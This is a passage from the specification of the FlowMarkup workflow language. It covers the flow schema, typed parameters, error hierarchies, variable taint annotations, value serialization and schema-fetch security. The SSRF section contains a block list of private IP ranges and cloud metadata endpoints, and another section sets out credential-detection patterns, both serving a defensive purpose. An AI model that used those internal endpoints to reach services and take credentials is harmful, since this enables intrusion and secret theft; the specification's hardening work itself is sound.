  circuitBreaker:              # optional -- object, "threshold/name", integer, or =CEL_REF
    name: '<cel-expression>'
    threshold: integer|CEL
    window: duration|integer|CEL # default: 1m
    resetTimeout: duration|integer|CEL # default: 30s
    halfOpenAttempts: integer|CEL # default: 3
    scope: GLOBAL|CONTEXT|LOCAL # default: GLOBAL
    errors: [ErrorType]         # optional whitelist (mutually exclusive with nonCountable)
    nonCountable: [ErrorType]   # optional blacklist (mutually exclusive with errors)

  defaults:                     # optional -- inherited by all descendant action steps
    retry: { ... } | "maxAttempts/delay/backoff"
    timeout: duration|integer
    rateLimit: { ... } | "invocations/per[/scope]"
    circuitBreaker: { ... } | =CEL_REF    # no shorthand in defaults (SA-DEF-5)
    cacheHint: { ... } | "<ttl>[/<revalidation>[/<scope>]]" | true | false

  idempotencyKey: "<cel-expression>" # optional -- deduplication key

  transaction: true | "GLOBAL" | "CONTEXT" | "LOCAL" # optional -- treats do: as implicit group (see §2.10)
  onRollbackError: CONTINUE | FAIL    # optional -- (default: CONTINUE)
  locking: PESSIMISTIC | OPTIMISTIC   # optional -- requires transaction: (default: PESSIMISTIC)

  triggers:                     # optional
    - event: event_type         #   optional condition: filter
    - cron: "0 9 * * MON-FRI"
    - schedule: "every 5m"

  events:                       # optional -- typed event contracts
    <event_type>:
      _notes_: ...
      data:
        <param_name>: <type>

  input:                        # optional
    <param>: <type>             # flat form; $default marks optional

  output:                       # optional
    <param>: <type>             # flat form, structured form, or single-value form

  yields:                       # optional -- streaming output contract
    $kind: <kind>               # single-value form
    # OR params: { <name>: { $kind, $schema, _notes_ } }

  throws:                       # optional
    - ErrorTypeName             # string form
    - { $kind, $parent, _notes_ } # object form

  requires:                     # REQUIRED -- capability requirements (use {} for none)
    ENV: [var1, var2]           #   per-variable
    CONTEXT: [key1, key2]       #   per-key read-write, or {read: [...], write: [...]}
    GLOBAL: [key1, key2]        #   per-key read-write, or {read: [...], write: [...]}
    SERVICES: [alias1, ...]     #   per-service array or typed object
    SUBFLOWS: true              #   boolean
    REQUEST: [origin1, ...]     #   per-origin pattern array
    EXEC: [cmd1, cmd2]          #   per-executable array
    MAIL: true | [@domain]      #   boolean or per-recipient array
    RUNTIME: true               #   boolean
    SECRET: [name1, name2]      #   per-secret array
    RESOURCES: [res1, ...]      #   named list or typed object

  services:                     # optional -- flow-defined service instances
    <alias>:
      provider: <provider-id>   # static string, not CEL
      properties: { ... }

  types:                        # optional -- named JSON Schema (Draft 2020-12) types
    <PascalCaseName>: { ... }   # inline JSON Schema or $ref to external file

  const:                        # optional -- immutable, initialized first
    <name>: <value | CEL>

  functions:                    # optional -- user-defined CEL functions
    <name>:
      params: [<param>, ...]
      body: =<CEL expression>

  examples:                     # optional -- named input/output example pairs
    <snake_case_name>:
      _notes_: string
      input:  { ... }
      output: { ... } | scalar

  onVersionChange:              # optional -- migration handler for checkpoint resume
    - <step>

  vars:                         # optional -- mutable state, initialized after const:
    <name>: <value | $kind declaration>

  do:                           # REQUIRED
    - <step>

  catch:                        # optional -- global error handler (map form)
    ErrorType:
      - <step>
    default:
      - <step>

  finally:                      # optional -- always runs
    - <step>
```

**Key rules:**
- `_id_`, `_label_`, `_notes_`, `_meta_` are step-level only, NOT valid at the flow root.
- `flowmarkup:` is the only key processed by the engine. Additional root-level keys are allowed and ignored.
- When `transaction:`, `onRollbackError:`, or `locking:` appear at the flow root, the engine treats the `do:` list as an implicit sequential `group:` with those properties — syntactic sugar for wrapping the entire `do:` in a single `group: { transaction: ..., onRollbackError: ..., locking: ..., do: [...] }`. `catch:` and `finally:` are unaffected and execute outside the implicit group.
- `defaults:` applies only to action steps, not directives. Step-level values **replace** (not merge with) inherited defaults. Set to `null` to disable an inherited default. `cacheHint:` in `defaults:` is silently ignored by non-storage action steps.
- `cacheHint:` has three states: when omitted, the step inherits from `defaults:`; `cacheHint: false` is an explicit opt-out, by which the author asserts this data MUST NOT be cached; `cacheHint: true` is an explicit opt-in with engine-determined defaults.
- `finally:` runs after `catch:` handlers. If `finally:` itself throws, that error supersedes the original. The engine MUST chain the original error as `ERROR.CAUSE` on the finally-thrown error.
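
The `catch:`/`finally:` ordering and the `ERROR.CAUSE` chaining rule can be illustrated with a minimal Python sketch. `FlowError`, `run_flow`, and the `cause` attribute are hypothetical names, not part of FlowMarkup. The sketch matches handlers by exact type name only and assumes the "original" error is whatever is still propagating once `catch:` has run.

```python
class FlowError(Exception):
    """Hypothetical stand-in for an engine error; `cause` models ERROR.CAUSE."""

    def __init__(self, type_name, cause=None):
        super().__init__(type_name)
        self.type_name = type_name
        self.cause = cause


def run_flow(do, catch_handlers, finally_steps):
    """Run do -> catch -> finally and chain errors as the rule describes."""
    pending = None  # error still propagating after catch: has run
    try:
        do()
    except FlowError as err:
        handler = catch_handlers.get(err.type_name, catch_handlers.get("default"))
        if handler is None:
            pending = err              # no handler: the error keeps propagating
        else:
            try:
                handler(err)
            except FlowError as rethrown:
                pending = rethrown     # handler itself failed
    try:
        finally_steps()                # always runs, after any catch handler
    except FlowError as fin_err:
        fin_err.cause = pending        # original error is chained as the cause
        raise fin_err                  # finally-thrown error supersedes it
    if pending is not None:
        raise pending
```

Calling `run_flow` with a failing `do` and a failing `finally_steps` surfaces the finally-thrown error, with the earlier error reachable through `cause`.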

### 2.3 Flow Input / Output / Throws

The flow is a typed function: `flow(input) -> output throws errors`.

**Flat form** (preferred):

```yaml
input:
  order_id: STRING              # required -- no $default
  priority: {$default: standard}                   # optional — STRING inferred from $default
output:
  result: JSON
```

In flat `input:`, `$default` makes a param optional. In flat `output:`, all params are required.

Both `input:` and `output:` support flat form and structured form (`required:`/`optional:` subsections):

```yaml
input:
  required:
    order_id: STRING
    amount: NUMBER
  optional:
    currency: {$default: "USD"}                     # STRING inferred from $default
```

**Structured form** (when `output:` has optional params):

```yaml
output:
  required:
    best_result: TEXT
  optional:
    comparison_data: JSON
```

**Single-value output form:**

```yaml
output:
  $kind: BINARY
  $type: image/png
```

Paired with `return: <expression>` in the flow body.

**Parameter definition shorthand:** `order_id: STRING` is equivalent to `order_id: { $kind: STRING }`.

#### Error Type Hierarchy

Rules for `$parent:`:
- Parent MUST be declared in the same `throws:` list OR be a system error type (SA-ERR-2). System error types (those listed in FLOWMARKUP-ERRORS.md) are implicitly available as parents and do not need re-declaration.
- User-defined errors may extend other user-defined errors, provided the parent is declared earlier in the same `throws:` list. Multi-level chains are valid (e.g., `A extends B extends SystemError`).
- No cycles (SA-ERR-1), no self-parent (SA-ERR-4)
- Catch order matters: parent before child makes child unreachable (SA-ERR-3 warning)
- `ERROR.TYPE` always reflects the exact thrown type, even when matched polymorphically
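
As a rough illustration of these rules, the Python sketch below walks `$parent` links to pick a handler. The function names and the `parents` mapping are hypothetical. It assumes handlers are tried in declaration order and that `default` acts as a fallback after all typed handlers, which the rules above do not state explicitly.

```python
def ancestors(error_type, parents):
    """Yield error_type, then each ancestor reached by following $parent links."""
    seen = set()
    current = error_type
    while current is not None:
        if current in seen:
            # A cycle would be rejected statically (cf. SA-ERR-1).
            raise ValueError(f"cycle in error hierarchy at {current}")
        seen.add(current)
        yield current
        current = parents.get(current)


def select_handler(thrown_type, catch_keys, parents):
    """Return the first catch key, in declared order, that matches thrown_type."""
    lineage = set(ancestors(thrown_type, parents))
    for key in catch_keys:
        if key != "default" and key in lineage:
            return key          # the thrown type itself is left unchanged
    return "default" if "default" in catch_keys else None
```

With `NetworkError` listed before `TimeoutError`, the parent handler wins and the child handler is never reached, which is the situation SA-ERR-3 warns about.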

**Nested shorthand:** Error hierarchies can be declared inline using map form:

```yaml
throws:
- NetworkError:
  - ConnectionRefusedError
  - DnsResolutionError
  - $kind: TimeoutError
    data:
      elapsed_ms: INTEGER
- FraudDetectedError              # no parent (flat form)
```

Desugars to flat list with `$parent` references. Parent type is implicitly declared. Children can be strings, `$kind` objects (with `data:`/`_notes_`), or nested hierarchies (recursive for multi-level). Mixed nested and flat items may coexist. SA-ERR-8: parent key must match error naming pattern (PascalCase, starts with uppercase).
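
The desugaring step might look like the following Python sketch, which operates on the parsed YAML list. `desugar_throws` is a hypothetical helper, and the flat output shape (`$kind` for the name, `$parent` for the parent) is an assumption based on the object form shown above.

```python
def desugar_throws(items, parent=None):
    """Flatten nested throws: shorthand into a flat list of error declarations."""
    flat = []
    for item in items:
        if isinstance(item, str):            # bare error name
            entry, children = {"$kind": item}, []
        elif "$kind" in item:                # object form (may carry data:/_notes_)
            entry, children = dict(item), []
        else:                                # {ParentName: [child, ...]}
            (name, children), = item.items()
            entry = {"$kind": name}          # parent type is implicitly declared
        if parent is not None:
            entry["$parent"] = parent
        flat.append(entry)                   # parent always precedes its children
        flat.extend(desugar_throws(children, parent=entry["$kind"]))
    return flat
```

Because the function recurses on each child list, multi-level hierarchies flatten the same way, and every parent lands earlier in the list than its children.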

Parent types automatically inherit the union of all children's `data:` fields — when catching a parent, `ERROR.DATA` has the shape of whichever child was actually thrown. When a `catch:` handler catches a parent type whose children have heterogeneous `data:` fields, accessing a child-specific field without a `has()` guard is unsafe — the field may not exist if a different child was thrown. Use `has(ERROR.DATA.field)` before accessing child-specific fields. SA-ERR-10 (WARN) flags unguarded access to child-specific error data fields in parent catch handlers.

#### Flow Yields (`yields:`)

A flow MAY declare a streaming output contract via `yields:`, independent of `output:`. The caller chooses consumption mode:
- **Streaming** -- `onYield:` on the call/run step
- **Materialized list** -- `$yields` in the step's `result:` mapping

**Two forms:**
- **Single-value** -- `yields: { $kind: TEXT }`
- **Multi-param** -- `yields: { params: { progress: { $kind: NUMBER } } }`

**`buffer:` on `onYield:`** -- controls how many yielded values buffer before the producer suspends. `0` (default) = synchronous backpressure.

**`onYield: FORWARD`** -- re-yield each element to the current flow's caller with end-to-end backpressure.

**Ordering guarantees:**
- `SEQUENCE` -- yields arrive in emission order
- `PARALLEL` -- yields interleave in arrival order
- `RACE` -- `yield` and `onYield: FORWARD` inside RACE branches are forbidden (SA-YIELD-10, SA-YIELD-20)

### 2.4 Data Elements (`vars`, `const`)

Data elements are named, typed values within a flow. They come in two forms: **mutable** (declared in `vars:` or created by `set:`) and **readonly** (declared in `const:` or marked with `$readonly: true`). Both share the same typed declaration model.

Data element names MUST be valid identifiers (`snake_case` recommended). Hyphens are forbidden (subtraction operator in CEL). The `$` character is forbidden in data element names.

Variables in `vars:` are initialized before `do:` (after `const:`). `=`-prefixed strings are CEL expressions; plain strings are literals; non-strings pass through. A `vars:` expression MUST NOT reference another `vars:` name (SA-INIT-2).

**Typed declarations** use `$kind` (REQUIRED)/`$type`/`$format`/`$value` (REQUIRED)/`$encoding`/`$name`/`$charset`:

**Naming rationale:** `$value` is the initial value assigned unconditionally when the variable is created. `$default` (on input parameters) is used only when the caller omits the parameter — the caller may override it. The distinction reflects the different semantics: variables always start with `$value`; parameters start with `$default` only in the absence of a caller-provided value.

```yaml
vars:
  greeting: Hello world           # string literal
  counter: 0                      # number
  api_config:
    $kind: JSON                   # compound shorthand: expands to $kind: MAP, $type: application/json
    $value: { endpoint: "https://api.example.com" }
  thumbnail:
    $kind: BINARY
    $type: image/png
    $name: photo.png
    $encoding: BASE64
    $value: iVBORw0KGgo...
  currency_code:
    $kind: STRING
    $format: "^[A-Z]{3}$"
    $value: USD
  user_data:
    $kind: CSV
    $value: |
      name,email,role
      alice,alice@example.com,admin
      bob,bob@example.com,viewer
  encoded_report:
    $kind: CSV
    $charset: windows-1252
    $value: =meta(RESOURCES.legacy_export).value
```

`$encoding` is needed only for binary data stored as encoded text in `typedVar`/`set:` declarations. The only valid values are `BASE64`, `BASE64URL`, and `HEX`. For runtime value transformation (CEL `encode()`/`decode()` functions), additional encoding constants are available; see Encoding Constants below.

`$name` is an optional filename hint on any `typedVar`.

#### Variable Taint System (`$secret`, `$exportable`)

Two metadata fields on `typedVar` and `set:` typed declarations provide defense-in-depth for sensitive values:

**`$secret: true`** — variable becomes a local SecretValue. All SA-SECRET rules apply. Cannot be logged, returned, emitted, yielded, interpolated, compared, or assigned to another variable. Only valid use: pass to action `params:`. Implies `$exportable: false`.

**`$exportable: false`** -- value is accessible in CEL (read, compare, transform) but blocked from output boundaries: `log:`, `return:`, `emit.data:`, `yield:`, `request.url:`, `throw.message:`. Weaker than `$secret` but allows computation.

> **Security boundary:** `$exportable: false` prevents accidental exposure at output boundaries (return, emit, yield, log). It does NOT prevent intentional exfiltration through action parameters, request bodies, or request headers. For values that must never leave the engine process, use `$secret: true` (opaque SecretValue — no CEL string operations).
>
> Threat model: `$exportable: false` defends against careless flow authoring. `$secret: true` defends against malicious flow authoring.

```yaml
vars:
  db_url:
    $kind: TEXT
    $exportable: false          # may contain credentials in URI
    $value: =ENV.DATABASE_URL
  auth_response:
    $kind: JSON                 # compound shorthand
    $secret: true               # entire value is secret-grade
    $value: null
```

**Auto-detection (runtime):** The engine MUST auto-detect credential patterns in string values at assignment time and apply `$exportable: false` taint automatically. At minimum, engines MUST detect: URI with userinfo (`scheme://user:pass@host`) and JWT tokens (`eyJ...` prefix with two dots). Engines SHOULD also detect known API key formats (configurable engine-level pattern list).
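
A minimal Python sketch of the two mandatory detections follows. The regular expressions and the name `looks_like_credential` are illustrative assumptions; the specification does not prescribe exact patterns, and a real engine would add its configurable API-key list.

```python
import re

# scheme://user:pass@host  (userinfo that includes a password component)
URI_USERINFO = re.compile(r"[A-Za-z][A-Za-z0-9+.\-]*://[^/\s:@]+:[^/\s@]*@")

# Three dot-separated base64url segments, the first starting with "eyJ"
JWT = re.compile(r"eyJ[A-Za-z0-9_\-]*\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]*")


def looks_like_credential(value):
    """Return True if a string value should receive $exportable: false taint."""
    if not isinstance(value, str):
        return False
    return bool(URI_USERINFO.search(value) or JWT.search(value))
```

An engine following this approach would run the check at every assignment and mark matching values as non-exportable before they become visible to later steps.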

**`$sanitized: true`** — marks a string value as having passed through an application-level sanitization step. Setting `$sanitized: true` on a variable suppresses SA-MAIL-15 and SA-XML-3 that would otherwise fire when the value is used in HTML or XML contexts. `$sanitized` does NOT affect taint propagation — a value can be both `$secret: true` and `$sanitized: true` (sanitized for output but still tainted for tracking). Engines MUST NOT auto-set `$sanitized`. SA-TAINT-6 (ERROR) flags `$sanitized: true` on values that have not passed through a recognised sanitization function within the same flow. **Provenance requirement:** `$sanitized: true` is only valid when the value's data-flow trace shows it passed through a built-in sanitization function (`htmlSanitize()`, `htmlEscape()`, `regexQuote()`) or was returned from a service call declared as a sanitizer. Flows SHOULD use `$sanitizedBy: <function_or_service>` to declare the sanitization provenance explicitly (e.g., `$sanitizedBy: htmlSanitize` or `$sanitizedBy: "service:sanitizer.clean"`). When `$sanitizedBy` is present, the engine validates provenance at load time. When `$sanitized: true` is used without `$sanitizedBy`, SA-TAINT-6 fires at ERROR severity.

**`$trusted: true`** — marks a data element as originating from a trusted source. `$trusted` is a boolean annotation, default `false`. Trusted values are exempt from user-input taint checks: SA-EXEC-11, SA-SSH-10, SA-STORAGE-18, and SA-XML-3 do not fire on `$trusted` values even when those values appear in injection-sensitive positions. `$trusted` does NOT bypass `$secret` / `$exportable` restrictions — a value can be trusted (from admin config) yet secret (contains credentials). Engines MUST NOT auto-set `$trusted`. **Provenance restriction:** `$trusted: true` is only valid on values that trace to trusted sources: `const:` literals, `ENV.*` values, `RUNTIME.*` values, or values returned from a service declared with `trusted: true` in the engine service configuration. SA-TAINT-7 (ERROR) flags `$trusted: true` on values derived from `input:` parameters, `EVENT.DATA.*`, `request` response bodies, `exec` stdout/stderr, or CEL expressions referencing any of these. SA-TAINT-7a (WARN) flags `$trusted: true` on values derived from `CONTEXT.*` or `GLOBAL.*` (which may have been set by untrusted flows).

Static analysis: SA-TAINT-1 (ERROR) rejects `$secret: true` variables at output boundaries. SA-TAINT-2 (ERROR) rejects `$exportable: false` variables at output boundaries. SA-TAINT-3 (INFO) notes redundant `$secret` + `$exportable: false`. SA-TAINT-4 (ERROR) flags an action `result:` value from an auth/credential-related operation that is assigned to a variable without `$exportable: false`. SA-ENV-4 (WARN) warns on ENV values matching credential patterns assigned without `$exportable: false`.

**`$readonly: true`** — marks the data element as immutable after initial assignment. Equivalent to declaring in `const:`. Writing to a `$readonly` data element is SA-CONST-1 ERROR. When a readonly data element's value is copied to another data element via `set:`, the target does **not** inherit `$readonly` — only the value is copied. `$readonly` and `$secret` are orthogonal and can be combined. `$readonly` is NOT valid on `forEach` `as:` loop variables (the loop binding is engine-managed).

```yaml
vars:
  api_base:
    $readonly: true
    $kind: STRING
    $value: =ENV.API_HOST + "/v2"
```

At runtime, the engine decodes `$encoding`-annotated values during initialization (e.g., base64 string → `byte[]`). CEL expressions and action params receive the decoded raw value. See "Value Projection" below.

#### Value Projection (Auto-Unwrapping)

Typed declarations carry metadata (`$kind`, `$type`, `$format`, `$encoding`, `$name`, `$nullable`, `$schema`) alongside their value. The engine MUST guarantee that this metadata is **never** leaked into user-visible output — data elements always auto-project to their raw value.

**Typed value storage.** The engine stores each typed variable as an internal pair: **raw value** + **metadata**. On initialization:

- `$encoding`-annotated values are decoded into raw `byte[]`. The decoded bytes become the raw value; the original encoded string is discarded. The three `$encoding` constants (`BASE64`, `BASE64URL`, `HEX`) all produce `byte[]`. Invalid encoded data throws `ValidationError` at initialization time.
- Non-encoded `$value` passes through as-is (string, number, map, list, null).
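
The decoding step can be sketched in Python as below. `decode_encoded_value` is a hypothetical helper and the local `ValidationError` class stands in for the engine's error type. The sketch assumes padded input for the two base64 variants, which the specification does not state.

```python
import base64


class ValidationError(Exception):
    """Stand-in for the engine's ValidationError."""


def decode_encoded_value(encoding, text):
    """Decode a $value string into raw bytes according to its $encoding."""
    try:
        if encoding == "BASE64":
            return base64.b64decode(text, validate=True)
        if encoding == "BASE64URL":
            # URL-safe alphabet: '-' and '_' replace '+' and '/'
            return base64.b64decode(text, altchars=b"-_", validate=True)
        if encoding == "HEX":
            return bytes.fromhex(text)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValidationError(f"invalid {encoding} data") from exc
    raise ValidationError(f"unsupported $encoding: {encoding}")
```

After this step only the returned bytes are kept; the encoded string is no longer needed.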

**CEL projection rule.** CEL expressions always resolve to the **raw value**, never the metadata wrapper:

- `=thumbnail` evaluates to `byte[]` (decoded PNG bytes), not `{$kind: BINARY, $type: image/png, $value: ...}`.
- `=api_config` evaluates to `{ endpoint: "https://api.example.com" }`, not `{$kind: JSON, $value: ...}`.
- Metadata is accessible via the `meta()` CEL macro. Dot-access to `$`-prefixed properties (e.g., `variable.$type`) is not supported.

**`meta()` CEL macro.** `meta(variable)` returns a `map(string, dyn)` containing the variable's engine-internal metadata. It works on all typed variables, not just RESOURCES. `meta` is a **CEL macro** (AST-level, like `has()`), not a runtime function — because CEL evaluates arguments before passing to functions, which would trigger Value Projection and strip metadata.

| Key | Type | Available on | Description |
|---|---|---|---|
| `type` | `string` | All typed vars | MIME content type (derived from `$kind` if not explicit) |
| `kind` | `string` | All typed vars | Structural kind constant (`STRING`, `BINARY`, `MAP`, etc.) |
| `name` | `string \| null` | All typed vars | Filename hint (`null` if not declared) |
| `size` | `int \| null` | RESOURCES only | Content length in bytes (`null` for non-RESOURCES) |
| `value` | `dyn \| null` | RESOURCES only | Lazy-loaded content (`null` for non-RESOURCES) |
| `readonly` | `bool` | All data elements | `true` if the data element is readonly (`const:` or `$readonly: true`) |

Examples:
```
=meta(thumbnail).type == "image/png"
="uploads/" + meta(RESOURCES.config).name
=meta(api_response).kind == "MAP"
=meta(RESOURCES.data).size > 1000000
=meta(RESOURCES.legacy_export).value
```

Action providers (e.g., `mail`, `request`) continue to access metadata through the engine's internal variable store API.

**Auto-serialization rules.** When a value passes through a serialization boundary, the engine transforms it based on the target context:

| Context | Binary (`byte[]`) | Non-binary values |
|---|---|---|
| **JSON serialization** (params, return, `request` body `json:`, `value.encode(JSON)`) | Base64-encoded string | Pass through as-is |
| **YAML serialization** (checkpointing, `value.encode(YAML)`) | `!!binary` tag with base64 | Pass through as-is |
| **String concatenation** (`+` in CEL) | Base64-encoded string | Auto-stringify (existing rule) |
| **Template interpolation** (`{{thumbnail}}`) | Base64-encoded string | Auto-stringify (existing rule) |
| **Logging** (`log:`) | `<binary N bytes>` summary | Auto-stringify |
| **HTTP request body** (`request` action, `raw:` or string shorthand) | Raw bytes (engine sets Content-Type from `$type`/`$kind` metadata) | Pass through |
| **HTTP multipart part** (`request` body `multipart:`) | Raw bytes (engine uses `$type`/`$kind` for part Content-Type, `$name` for filename) | Pass through |
| **Mail attachment** (bare variable ref) | Raw bytes for attachment body; `$type`/`$kind` → Content-Type, `$name` → filename | Pass through |
| **Mail attachment** (object form `{data:, ...}`) | Raw bytes; explicit `contentType:` overrides the value's `$type`/`$kind` metadata; `name:` overrides `$name` | Pass through |
| **Sub-flow params** (`run`/`call` `params:`) | Projected via CEL (raw bytes) | Projected via CEL |

**Key principle:** At **wire/serialization boundaries** (JSON, YAML, string), bytes become base64. At **binary-native boundaries** (HTTP body, multipart, mail attachment), bytes stay as raw bytes and the engine uses metadata for Content-Type/filename.
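
To make the distinction concrete, here is a small Python sketch of three boundaries from the table. The function names are hypothetical, and the sketch covers only the `byte[]` column; metadata-driven Content-Type handling is left out.

```python
import base64
import json


def to_json(value):
    """JSON boundary: bytes become base64 text, other values pass through."""
    def encode_bytes(obj):
        if isinstance(obj, (bytes, bytearray)):
            return base64.b64encode(obj).decode("ascii")
        raise TypeError(f"not JSON serializable: {type(obj).__name__}")
    return json.dumps(value, default=encode_bytes)


def to_log(value):
    """Logging boundary: bytes are summarised rather than dumped."""
    if isinstance(value, (bytes, bytearray)):
        return f"<binary {len(value)} bytes>"
    return str(value)


def to_http_body(value):
    """Binary-native boundary: bytes stay as raw bytes."""
    return bytes(value) if isinstance(value, (bytes, bytearray)) else value
```

The same byte string therefore has three different shapes depending on where it leaves the engine: base64 text in JSON, a size summary in logs, and untouched bytes in an HTTP body.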

**Source-format serialization.** At binary-native boundaries (HTTP request body, multipart part, mail attachment), non-binary typed values with explicit `$type` metadata are serialized in the format indicated by `$type` — not defaulting to JSON. The engine applies the format-appropriate serializer:

| `$type` | Serialization |
|---|---|
| `application/json` | JSON text |
| `application/yaml` | YAML text |
| `application/xml` | XML text |
| `text/csv` | CSV text (RFC 4180) |
| `text/tab-separated-values` | TSV text |

If the engine has cached the original source bytes (from RESOURCE load, HTTP response, exec stdout, or `decode()`/`parse()`), it SHOULD use those exact bytes for byte-level fidelity. Otherwise, it re-serializes from the in-memory representation. Values without explicit `$type` metadata (or with `$type: application/json`) use JSON serialization as the default. This ensures that a CSV-typed variable sent as an email attachment arrives as CSV text, not as a JSON array.

**Cross-scope writes.** When writing a typed variable to `GLOBAL.*`, the engine stores the raw value only — `$kind`/`$type`/`$format`/`$name`/`$encoding` metadata is flow-local and does not propagate to the engine-wide global store. `CONTEXT.*` writes preserve the full `TypedValue` (metadata + raw value) since the execution chain shares type expectations between caller and sub-flow.

#### 2.4.1 Structural Types (`types:`)

`types:` declares named types as JSON Schema (Draft 2020-12). Keys are PascalCase (`^[A-Z][a-zA-Z0-9]*$`).

```yaml
types:
  Order:
    type: object
    properties:
      id: { type: string }
      status: { type: string, enum: [pending, processing, shipped] }
    required: [id, status]
  Customer: { $ref: "schemas/customer.schema.json" }
```

External schemas are loaded via `$ref`. HTTP/HTTPS URLs are supported with optional `integrity:` pinning (SA-TYPE-11 applies to `http://` URLs; SA-TYPE-12 warns on `https://` URLs without `integrity:`). `$ref` supports JSON Pointer fragments.

**Schema fetch security:** Schema fetches via `$ref` URLs MUST be subject to the same origin restrictions as the `REQUEST` capability: the engine MUST NOT allow schema `$ref` URLs to reach internal network endpoints not authorized by the engine's configuration.

- **DNS validation:** The engine MUST resolve DNS at fetch time and validate the resolved IP address, not just the hostname, against private/internal IP ranges before connecting. This prevents DNS rebinding attacks where an allowed hostname resolves to an internal IP after the initial allowlist check. The engine MUST pin the resolved IP for the duration of the schema fetch.
- **Private/internal IP ranges:** `10.*`, `172.16-31.*`, `192.168.*`, `127.*`, `169.254.*`, `::1`, `fc00::/7`, `fd00::/8`, `fe80::/10`.
- **Redirects:** Schema fetches MUST follow the same redirect origin enforcement as the `request` action (§4.3): each redirect target MUST be validated against private/internal IP ranges before connecting, and the engine MUST NOT follow redirects to origins not authorized by the engine's schema-fetch configuration. Maximum redirect depth: 5. SA-TYPE-14 (ERROR) rejects `$ref` schema fetches that receive a redirect to a private/internal IP range.
- **Caching and integrity:** The engine SHOULD cache resolved schemas by content hash and serve from cache on subsequent loads. For `https://` URLs, the engine SHOULD support SRI-style `integrity:` pinning on `$ref` values.
- **Static analysis:** SA-TYPE-13 warns when a `$ref` URL targets a private/internal IP range.

**Additional SSRF hardening.** IPv4-mapped IPv6 addresses (`::ffff:0.0.0.0/96`) MUST be normalized to their IPv4 equivalent before range checks. Cloud metadata endpoints MUST be blocked by both IP and hostname: `169.254.169.254`, `fd00:ec2::254`, `metadata.google.internal`, `metadata.azure.com`, `100.100.100.200` (Alibaba), `169.254.169.254:*` (any port). Schema `$ref` URLs MUST use `https://` scheme. `http://` is permitted only when `integrity:` is also specified. All other schemes (`file://`, `ftp://`, `gopher://`, `data://`) MUST be rejected with `SchemaResolutionError`. URLs containing embedded credentials (`user:pass@host`) MUST be rejected. *(CWE-918)*
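
The static parts of these checks can be sketched in Python with the standard `ipaddress` and `urllib.parse` modules. `is_blocked_ip` and `check_ref_url` are hypothetical names, and the sketch deliberately omits DNS resolution, IP pinning, and redirect handling, which a conforming engine would still need.

```python
import ipaddress
from urllib.parse import urlsplit

BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
    "100.100.100.200/32",   # Alibaba metadata endpoint
)]
BLOCKED_HOSTS = {"metadata.google.internal", "metadata.azure.com"}


def is_blocked_ip(text):
    """Return True if a resolved address falls in a private/internal range."""
    addr = ipaddress.ip_address(text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped   # normalise ::ffff:a.b.c.d before range checks
    return any(addr.version == net.version and addr in net
               for net in BLOCKED_NETWORKS)


def check_ref_url(url, has_integrity=False):
    """Return None if the URL passes the static checks, else a reason string."""
    parts = urlsplit(url)
    if parts.scheme not in ("https", "http"):
        return "scheme not allowed"
    if parts.scheme == "http" and not has_integrity:
        return "http:// requires integrity:"
    if parts.username is not None or parts.password is not None:
        return "embedded credentials"
    if (parts.hostname or "") in BLOCKED_HOSTS:
        return "cloud metadata hostname"
    return None
```

In this arrangement `check_ref_url` would run before any network activity, and `is_blocked_ip` would run on every resolved address, including each redirect target.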

**`$schema:` on `paramDef`** -- associates a structural type with a parameter:
```yaml
input:
  order: { $schema: Order }             # MAP inferred from schema; or { $kind: JSON, $schema: Order }
```

**`$enum:` shorthand** -- mutually exclusive with `$schema:`:
```yaml
input:
  priority: { $enum: [low, normal, high, critical] }   # STRING inferred from $enum
```

**`$schema:` on `typedVar`** -- associates a structural type with a variable.

Types are optional annotations. Flows without `types:` work unchanged.

**Error types:** `SchemaLoadError` (malformed schema), `SchemaResolutionError` (unresolvable `$ref`).

#### 2.4.2 Constants (`const:`)

> The `const:` section declares readonly data elements. All entries are implicitly `$readonly: true`.

Immutable flow-local data elements, initialized before `vars:` and `do:`. CEL scope limited to `ENV.*`, `SECRET.*`, `GLOBAL.*`, `CONTEXT.*`, `RUNTIME.*` (SA-INIT-1). Writing to a `const` at runtime is a hard error (SA-CONST-1).

`SECRET.*` values stored in constants remain opaque `SecretValue` handles. The constant simply holds a reference — no inspection or coercion occurs. The value is resolved at action boundaries, just like direct `SECRET.*` references.

Init order: `const:` -> `vars:` -> `do:`.

#### 2.4.3 Number Semantics

All YAML number literals are stored as exact decimal at runtime. `0.1 + 0.2` equals exactly `0.3`.
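
The difference from binary floating point can be seen in a short Python comparison. Python's `decimal` module is used here only as an analogy; the specification does not say how an engine implements exact decimals.

```python
from decimal import Decimal

# Binary floating point cannot represent 0.1 or 0.2 exactly,
# so the sum differs from 0.3 in the last bits.
float_sum = 0.1 + 0.2
float_is_exact = (float_sum == 0.3)

# Decimal arithmetic on the literal text keeps every digit.
decimal_sum = Decimal("0.1") + Decimal("0.2")
decimal_is_exact = (decimal_sum == Decimal("0.3"))
```

Here `float_is_exact` is `False` and `decimal_is_exact` is `True`; the second result is the behaviour this section requires of flow arithmetic.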

#### Kind Constants (CEL Bindings)

Kind constants are listed in §1.3 (Unified Type System). The same constants are available as top-level CEL bindings (e.g., `STRING`, `NUMBER`, `BINARY`).

#### Compound Shorthand Constants (CEL Bindings)

| Shorthand | Expands to |
|---|---|
| `JSON` | `$kind: MAP, $type: application/json` |
| `YAML` | `$kind: MAP, $type: application/yaml` |
| `XML` | `$kind: MAP, $type: application/xml` |
| `CSV` | `$kind: ARRAY, $type: text/csv` |
| `TSV` | `$kind: ARRAY, $type: text/tab-separated-values` |

These shorthands are accepted in `$kind` positions and as bare paramDef values. The engine expands them at load time.

#### Encoding Constants

**`$encoding` constants** (3) — for binary-to-string encoding on `typedVar`/`set:` declarations:

| Constant | Encoding |
|---|---|
| `BASE64` | RFC 4648 standard base64 |
| `BASE64URL` | RFC 4648 URL-safe base64 |
| `HEX` | hexadecimal |

**CEL `encode()`/`decode()` constants** (8) — for runtime value transformation:

| Constant | Encoding |
|---|---|
| `BASE64` | RFC 4648 standard base64 |
| `BASE64URL` | RFC 4648 URL-safe base64 |
| `HEX` | hexadecimal |
| `UTF8` | UTF-8 |
| `UTF16BE` / `UTF16LE` | UTF-16 big/little-endian |
| `UTF32BE` / `UTF32LE` | UTF-32 big/little-endian |

#### Character Encoding Detection

